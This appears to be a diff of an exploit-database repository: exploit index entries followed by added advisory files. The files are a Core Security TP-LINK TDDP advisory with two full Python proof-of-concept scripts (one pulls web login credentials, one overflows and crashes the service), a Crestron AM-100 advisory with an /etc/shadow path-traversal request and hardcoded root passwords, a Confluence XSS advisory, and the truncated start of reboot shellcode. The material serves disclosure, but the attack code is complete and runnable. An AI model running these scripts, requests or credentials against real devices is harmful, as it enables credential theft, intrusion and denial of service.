29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0
29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0
29824,platforms/php/webapps/29824.txt,"QuizShock 1.6.1 - auth.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0
@ -31700,7 +31705,7 @@ id,file,description,date,author,platform,type,port
31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0
31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0
31555,platforms/php/webapps/31555.txt,"Simple Machines Forum 1.1.4 - Multiple Remote File Inclusion",2008-03-28,Sibertrwolf,php,webapps,0
31555,platforms/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusion",2008-03-28,Sibertrwolf,php,webapps,0
40770,platforms/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,php,webapps,0
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
@ -32269,7 +32274,7 @@ id,file,description,date,author,platform,type,port
32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0
32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0
32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0
32462,platforms/php/webapps/32462.txt,"Simple Machines Forum 1.1.6 - HTTP POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0
32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0
32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0
@ -32277,7 +32282,7 @@ id,file,description,date,author,platform,type,port
32473,platforms/php/webapps/32473.txt,"Joomla! Component com_jeux - 'id' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0
32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting",2008-10-11,d3v1l,php,webapps,0
32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary File Upload",2014-03-24,"felipe andrian",php,webapps,0
32520,platforms/php/webapps/32520.txt,"OpenCart 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0
32520,platforms/php/webapps/32520.txt,"OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0
32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro - 'id' Parameter SQL Injection",2008-11-02,"Hussin X",php,webapps,0
32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi - 'xurunler.asp' SQL Injection",2008-10-13,tRoot,asp,webapps,0
32486,platforms/php/webapps/32486.txt,"Webscene eCommerce - 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",php,webapps,0
@ -32468,7 +32473,7 @@ id,file,description,date,author,platform,type,port
32767,platforms/php/webapps/32767.txt,"Quick.CMS 5.4 - Multiple Vulnerabilities",2014-04-09,"Shpend Kurtishaj",php,webapps,0
32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution",2009-01-29,Perforin,cgi,webapps,0
32770,platforms/php/webapps/32770.txt,"E-PHP B2B Trading Marketplace Script - Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0
32773,platforms/php/webapps/32773.txt,"Simple Machines Forum 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0
32773,platforms/php/webapps/32773.txt,"Simple Machines Forum (SMF) 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0
32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 - Administration Settings Authentication Bypass",2009-02-04,make0day,php,webapps,0
32779,platforms/php/webapps/32779.txt,"Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection",2009-02-06,Gizmore,php,webapps,0
32782,platforms/php/webapps/32782.txt,"FotoWeb 6.0 - Login.fwx s Parameter Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps,0
@ -34048,7 +34053,7 @@ id,file,description,date,author,platform,type,port
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection",2011-03-27,MustLive,php,webapps,0
35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0
35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0
35558,platforms/php/webapps/35558.txt,"PHP-Fusion - 'articles.php' Cross-Site Scripting",2011-04-02,KedAns-Dz,php,webapps,0
40817,platforms/java/webapps/40817.txt,"AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting",2016-11-22,"Julien Ahrens",java,webapps,0
35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0
35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 - 'jobVacancy.php' Cross-Site Scripting",2011-03-27,"AutoSec Tools",php,webapps,0
35515,platforms/php/webapps/35515.txt,"Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0
@ -34381,7 +34386,7 @@ id,file,description,date,author,platform,type,port
36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0
36081,platforms/php/webapps/36081.txt,"VicBlog - 'tag' Parameter SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0
36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'FileManager/Controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0
36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0
36083,platforms/php/webapps/36083.txt,"Simple Machines Forum (SMF) 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0
36084,platforms/php/webapps/36084.html,"Mambo 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0
36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0
36086,platforms/php/webapps/36086.txt,"Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0
@ -34603,7 +34608,7 @@ id,file,description,date,author,platform,type,port
36481,platforms/php/webapps/36481.txt,"WordPress Plugin TheCartPress 1.6 - 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,php,webapps,0
36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 - administrator/index.php URI Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0
36408,platforms/php/webapps/36408.txt,"WordPress Plugin Pretty Link 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum (SMF) 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0
36413,platforms/php/webapps/36413.txt,"WordPress Plugin SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
36401,platforms/php/webapps/36401.txt,"AtMail 1.04 - 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0
36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Parameter Cross-Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0
@ -36403,7 +36408,7 @@ id,file,description,date,author,platform,type,port
39589,platforms/php/webapps/39589.txt,"WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80
39590,platforms/php/webapps/39590.txt,"Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80
39591,platforms/php/webapps/39591.txt,"WordPress Plugin Brandfolder 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
39592,platforms/php/webapps/39592.txt,"WordPress Plugin Dharma booking 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
39592,platforms/php/webapps/39592.txt,"WordPress Plugin Dharma Booking 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
39593,platforms/php/webapps/39593.txt,"WordPress Plugin Memphis Document Library 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",multiple,webapps,80
39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80
@ -36805,3 +36810,5 @@ id,file,description,date,author,platform,type,port
40802,platforms/php/webapps/40802.txt,"FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery",2016-11-21,"Curesec Research Team",php,webapps,80
40803,platforms/php/webapps/40803.txt,"FUDforum 3.0.6 - Local File Inclusion",2016-11-21,"Curesec Research Team",php,webapps,80
40804,platforms/php/webapps/40804.txt,"Wordpress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0
40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0
40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0

Can't render this file because it is too large.

467
platforms/hardware/dos/40814.txt Executable file
View file

@ -0,0 +1,467 @@
1. Advisory Information
Title: TP-LINK TDDP Multiple Vulnerabilities
Advisory ID: CORE-2016-0007
Advisory URL: http://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities
Date published: 2016-11-21
Date of last update: 2016-11-18
Vendors contacted: TP-Link
Release mode: User release
2. Vulnerability Information
Class: Missing Authentication for Critical Function [CWE-306], Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [CWE-120]
Impact: Code execution, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2
3. Vulnerability Description
TP-LINK [1] ships some of their devices with a debugging protocol activated by default. This debugging protocol is listening on the 1040 UDP port on the LAN interface.
Vulnerabilities were found in the implementation of this protocol, that could lead to remote code execution and information leak (credentials acquisition).
4. Vulnerable Devices
TP-LINK WA5210g. (Firmware v1 and v2 are vulnerable)
Other devices might be affected, but they were not tested.
5. Vendor Information, Solutions and Workarounds
No workarounds are available for this device.
6. Credits
This vulnerability was discovered and researched by Andres Lopez Luksenberg from Core Security Exploit Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
7. Technical Description / Proof of Concept Code
TP-LINK distributes some of their hardware with a debugging service activate by default. This program uses a custom protocol. Vulnerabilities were found using this protocol, that could lead to remote code execution or information leak.
7.1. Missing Authentication for TDDP v1
[CVE-pending-assignment-1] If version 1 is selected when communicating with the TDDP service, there is a lack of authentication in place. Additionally if the message handler accepts the "Get configuration" message type, this will result in the program leaking the web interface configuration file, which includes the web login credentials.
The following is a proof of concept to demonstrate the vulnerability (Impacket [2] is required for the PoC to work):
import socket
import re
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct
class TDDP(Structure):
structure = (
('version','B=0x1'),
('type','B=0'),
('code','B=0'),
('replyInfo','B=0'),
('packetLength','>L=0'),
('pktID','<H=1'),
('subType','B=0'),
('reserved','B=0'),
('payload',':=""'),
)
def printPayload(self):
print self.getPayloadAsString()
def getPayloadAsString(self):
s=''
for i in range(len(self['payload'])):
s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
return s
class TDDPRequestsPacketBuilder(object):
SET_CONFIG = 1
GET_CONFIG = 2
CMD_SYS0_PR = 3
GET_SERIAL_NUMBER = 5
GET_PRODUCT_ID = 10
def getRequestPacket(self):
tddp = TDDP()
tddp['version'] = 1
tddp['replyInfo'] = 1
return tddp
def getConfigPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_CONFIG
tddp['payload'] = ('\x00'*0x10) + 'all'
tddp['packetLength'] = len(tddp['payload'])
return tddp
def setConfigPacket(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.SET_CONFIG
tddp['payload'] = ('\x00'*0x10) + trail
tddp['packetLength'] = len(tddp['payload'])
return tddp
def getSerialNumberPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_SERIAL_NUMBER
return tddp
def getProductIDPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_PRODUCT_ID
return tddp
def CMD_SYS0_PR_Packet(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.CMD_SYS0_PR
tddp['replyInfo'] = 2
tddp['payload'] = ('\x00'*0x10)
tddp['packetLength'] = len(tddp['payload'])
tddp['payload'] += trail
return tddp
class TPLINKConfig(object):
def __init__(self, aConfig):
self.__parseConfig(aConfig)
def __sanitizeKeyValue(self, k, v):
k = k.replace("\r", "")
k = k.replace("\n", "")
v = v.replace("\r", "")
v = v.replace("\n", "")
return k,v
def __parseConfig(self, aConfig):
self.__key_order = []
self.Header = aConfig[:0x10]
pending = aConfig[0x10:]
k_v = re.findall("(.*?) (.*)", pending)
for k, v in k_v:
k,v = self.__sanitizeKeyValue(k,v)
real_value = v.split(" ")
if len(real_value) == 1:
real_value = real_value[0]
self.__dict__[k] = real_value
self.__key_order.append(k)
def __str__(self):
cfg = []
cfg.append(self.Header)
for k in self.__key_order:
value = self.__dict__[k]
if not isinstance(value, basestring):
str_value = " ".join(value)
else:
str_value = value
line = "%s %s" % (k, str_value)
cfg.append(line)
str_cfg = "\r\n".join(cfg)
return str_cfg
class TDDPSessionV1(object):
def __init__(self, ip, port=1040):
self.ip = ip
self.port = port
self.req_buidler = TDDPRequestsPacketBuilder()
def send(self, aPacket):
self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.conn.sendto(str(aPacket), (self.ip, self.port))
self.conn.close()
def recv(self, n):
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(('', 61000))
data, addr = udp.recvfrom(n)
return TDDP(data)
def _send_and_recv(self, packet, n):
self.send(packet)
return self.recv(n)
#####################################
def getConfig(self):
c_packet = self.req_buidler.getConfigPacket()
return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])
def getSerialNumber(self):
c_packet = self.req_buidler.getSerialNumberPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()
def getProductID(self):
c_packet = self.req_buidler.getProductIDPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()
def setInitState(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
return self._send_and_recv(c_packet, 50000)
def save(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
self._send_and_recv(c_packet, 50000)
def reboot(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
self._send_and_recv(c_packet, 50000)
def clr_dos(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
self._send_and_recv(c_packet, 50000)
def setConfig(self, aConfig):
c_packet = self.req_buidler.setConfigPacket(str(aConfig))
self._send_and_recv(c_packet, 50000)
HOST = "192.168.1.254"
s = TDDPSessionV1(HOST)
config = s.getConfig()
print "user: ", config.lgn_usr
print "pass: ", config.lgn_pwd
7.2. Buffer Overflow in TDDP v1 protocol
[CVE-pending-assignment-2] A buffer overflow vulnerability was found when sending a handcrafted "set configuration" message to the TDDP service with an extensive configuration file and forcing version 1 in the packet.
The following is a proof of concept to demonstrate the vulnerability by crashing the TDDP service (Impacket [2] is required for the PoC to work). To reestablish the TDDP service the device must be restarted:
import socket
import re
import string
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct
class TDDP(Structure):
structure = (
('version','B=0x1'),
('type','B=0'),
('code','B=0'),
('replyInfo','B=0'),
('packetLength','>L=0'),
('pktID','<H=1'),
('subType','B=0'),
('reserved','B=0'),
('payload',':=""'),
)
def printPayload(self):
print self.getPayloadAsString()
def getPayloadAsString(self):
s=''
for i in range(len(self['payload'])):
s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
return s
class TDDPRequestsPacketBuilder(object):
SET_CONFIG = 1
GET_CONFIG = 2
CMD_SYS0_PR = 3
GET_SERIAL_NUMBER = 5
GET_PRODUCT_ID = 10
def getRequestPacket(self):
tddp = TDDP()
tddp['version'] = 1
tddp['replyInfo'] = 1
return tddp
def getConfigPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_CONFIG
tddp['payload'] = ('\x00'*0x10) + 'all'
tddp['packetLength'] = len(tddp['payload'])
return tddp
def setConfigPacket(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.SET_CONFIG
tddp['payload'] = ('\x00'*0x10) + trail
tddp['packetLength'] = len(tddp['payload'])
return tddp
def getSerialNumberPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_SERIAL_NUMBER
return tddp
def getProductIDPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_PRODUCT_ID
return tddp
def CMD_SYS0_PR_Packet(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.CMD_SYS0_PR
tddp['replyInfo'] = 2
tddp['payload'] = ('\x00'*0x10)
tddp['packetLength'] = len(tddp['payload'])
tddp['payload'] += trail
return tddp
class TPLINKConfig(object):
def __init__(self, aConfig):
self.__parseConfig(aConfig)
def __sanitizeKeyValue(self, k, v):
k = k.replace("\r", "")
k = k.replace("\n", "")
v = v.replace("\r", "")
v = v.replace("\n", "")
return k,v
def __parseConfig(self, aConfig):
self.__key_order = []
self.Header = aConfig[:0x10]
pending = aConfig[0x10:]
k_v = re.findall("(.*?) (.*)", pending)
for k, v in k_v:
k,v = self.__sanitizeKeyValue(k,v)
real_value = v.split(" ")
if len(real_value) == 1:
real_value = real_value[0]
self.__dict__[k] = real_value
self.__key_order.append(k)
def __str__(self):
cfg = []
cfg.append(self.Header)
for k in self.__key_order:
value = self.__dict__[k]
if not isinstance(value, basestring):
str_value = " ".join(value)
else:
str_value = value
line = "%s %s" % (k, str_value)
cfg.append(line)
str_cfg = "\r\n".join(cfg)
return str_cfg
class TDDPSessionV1(object):
def __init__(self, ip, port=1040):
self.ip = ip
self.port = port
self.req_buidler = TDDPRequestsPacketBuilder()
def send(self, aPacket):
self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.conn.sendto(str(aPacket), (self.ip, self.port))
self.conn.close()
def recv(self, n):
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(('', 61000))
data, addr = udp.recvfrom(n)
return TDDP(data)
def _send_and_recv(self, packet, n):
self.send(packet)
return self.recv(n)
#####################################
def getConfig(self):
c_packet = self.req_buidler.getConfigPacket()
return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])
def getSerialNumber(self):
c_packet = self.req_buidler.getSerialNumberPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()
def getProductID(self):
c_packet = self.req_buidler.getProductIDPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()
def setInitState(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
return self._send_and_recv(c_packet, 50000)
def save(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
self._send_and_recv(c_packet, 50000)
def reboot(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
self._send_and_recv(c_packet, 50000)
def clr_dos(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
self._send_and_recv(c_packet, 50000)
def setConfig(self, aConfig):
c_packet = self.req_buidler.setConfigPacket(str(aConfig))
self._send_and_recv(c_packet, 50000)
class Exploit(TDDPSessionV1):
def run(self):
c_packet = self.req_buidler.getRequestPacket()
c_packet['type'] = self.req_buidler.SET_CONFIG
c_packet['payload'] = "A"*325
c_packet['packetLength'] = 0x0264
return self.send(c_packet)
HOST = "192.168.1.254"
PORT = 1040
s = Exploit(HOST)
s.run()
8. Report Timeline
2016-10-04: Core Security sent an initial notification to TP-Link.
2016-10-07: Core Security sent a second notification to TP-Link.
2016-10-31: Core Security sent a third notification to TP-Link through Twitter.
2016-11-09: Core Security sent a fourth notification to TP-Link through email and Twitter without receiving any response whatsoever.
2016-11-10: Core Security sent a request to Mitre for two CVE ID's for this advisory.
2016-11-12: Mitre replied that the vulnerabilities didn't affected products that were in the scope for CVE.
2016-11-21: Advisory CORE-2016-0007 published.
9. References
[1] http://www.tplink.com/.
[2] https://www.coresecurity.com/corelabs-research/open-source-tools/impacket.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security
Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

32
platforms/hardware/remote/40813.txt Executable file
View file

@ -0,0 +1,32 @@
=================================================================
# Crestron AM-100 (Multiple Vulnerabilities)
=================================================================
# Date: 2016-08-01
# Exploit Author: Zach Lanier
# Vendor Homepage: https://www.crestron.com/products/model/am-100
# Version: v1.1.1.11 - v1.2.1
# CVE: CVE-2016-5639
# References:
# https://medium.com/@benichmt1/an-unwanted-wireless-guest-9433383b1673#.78tu9divi
# https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md
Description:
The Crestron AirMedia AM-100 with firmware versions v1.1.1.11 - v1.2.1 is vulnerable to multiple issues.
1) Path Traversal
GET request:
http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow
2) Hidden Management Console
http://[AM-100-ADDRESS]/cgi-bin/login_rdtool.cgi
The AM-100 has a hardcoded default credential of rdtool::mistral5885
This interface contains the ability to upload arbitrary files (RD upload) and can enable a telnet server that runs on port 5885 (RD Debug mode).
3) Hardcoded credentials
The default root password for these devices is root::awind5885
Valid login sessions for the default (non-debugging) management interface are stored on the filesystem as session01, session02.. etc. Cleartext credentials can be read directly from these files.

112
platforms/java/webapps/40817.txt Executable file
View file

@ -0,0 +1,112 @@
[RCESEC-2016-009] AppFusions Doxygen for Atlassian Confluence v1.3.2 renderContent() Persistent Cross-Site Scripting
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: AppFusions Doxygen for Atlassian Confluence
Vendor URL: www.appfusions.com
Type: Cross-site Scripting [CWE-79]
Date found: 29/06/2016
Date published: 20/11/2016
CVSSv3 Score: 6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.3
AppFusions Doxygen for Atlassian Confluence v1.3.2
AppFusions Doxygen for Atlassian Confluence v1.3.1
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.
4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
-Doxygen blueprint in Confluence to allow Doxygen archive imports
-Display documentation from annotated sources such as Java (i.e., JavaDoc),
C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and UNO/OpenOffice
flavors), Fortran, VHDL, Tcl, D in Confluence.
-Navigation supports code structure (classes, hierarchies, files), element
dependencies, inheritance and collaboration diagrams.
-Search documentation from within Confluence
-Restrict access to who can see/add what
-Doxygen in JIRA also available
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application offers the functionality to import Doxygen documentations via a file upload to make them available in a Confluence page, but does not properly validate the file format/the contents of the uploaded Doxygen file. Since the uploaded file is basically a zipped archive, it is possible to store any type of file in it like an HTML file containing arbitrary script.
In DoxygenFileServlet.java (lines 82-105) the "file" GET parameter is read
and used as part of a File object:
private void renderContent(HttpServletRequest request, HttpServletResponse response) throws IOException {
String pathInfo = request.getPathInfo();
String[] pathInfoParts = pathInfo.split("file/");
String requestedFile = pathInfoParts[1];
File homeDirectory = this.applicationProperties.getHomeDirectory();
String doxygenDir = homeDirectory.getAbsolutePath() + File.separator + "doxygen";
File file = new File(doxygenDir, requestedFile);
String contentType = this.getServletContext().getMimeType(file.getName());
if (contentType == null) {
contentType = "application/octet-stream";
}
response.setContentType(contentType);
FileInputStream inputStream = null;
ServletOutputStream outputStream = null;
try {
inputStream = new FileInputStream(file);
outputStream = response.getOutputStream();
IOUtils.copy((InputStream)inputStream, (OutputStream)outputStream);
}
finally {
IOUtils.closeQuietly((InputStream)inputStream);
IOUtils.closeQuietly((OutputStream)outputStream);
}
}
6. RISK
=======
To successfully exploit this vulnerability, the attacker must be authenticated and must have the rights within Atlassian Confluence to upload
Doxygen files (default).
The vulnerability allows remote attackers to permanently embed arbitrary script code into the context of an Atlassian Confluence page, which offers a wide range of possible attacks such as redirecting users to arbitrary pages, present phishing content or attacking the browser and its components of a user visiting the page.
7. POC
===========
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40817.zip
8. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4
9. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/08/2016: Discovery of the vulnerability
23/08/2016: Sent preliminary advisory incl. PoC to known mail address
30/08/2016: No response, sent out another notification
30/08/2016: Vendor response, team is working on it
20/10/2016: Vendor releases v1.3.4 which fixes this vulnerability
20/11/2016: Advisory released
9. REFERENCES
=============
https://bugs.rcesecurity.com/redmine/issues/13

74
platforms/lin_x86-64/shellcode/40808.c Executable file
View file

@ -0,0 +1,74 @@
# Name: "Linux reboot (bin/sh -c reboot) shellcode" (89 bytes)
# Platform: Linux 32 and 64 bit
# Author: Ashiyane Digital Security Team ~ MALWaRE43
# Contact: usertester123546 [at] gmail.com
# Tested on:
Linux javadkhof 4.4.0-47-generic #68-Ubuntu SMP Wed Oct 26 19:39:52 UTC
2016 x86_64 x86_64 x86_64 GNU/Linux
Linux navid 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21)
i686 GNU/Linux
------------------------------------------------------------------------------
Disassembly of section .shellcode:
08049060 <_start>:
8049060: eb 30 jmp 8049092 <mycall>
08049062 <shellcode>:
8049062: 5e pop %esi
8049063: 31 c0 xor %eax,%eax
8049065: 88 46 07 mov %al,0x7(%esi)
8049068: 88 46 0a mov %al,0xa(%esi)
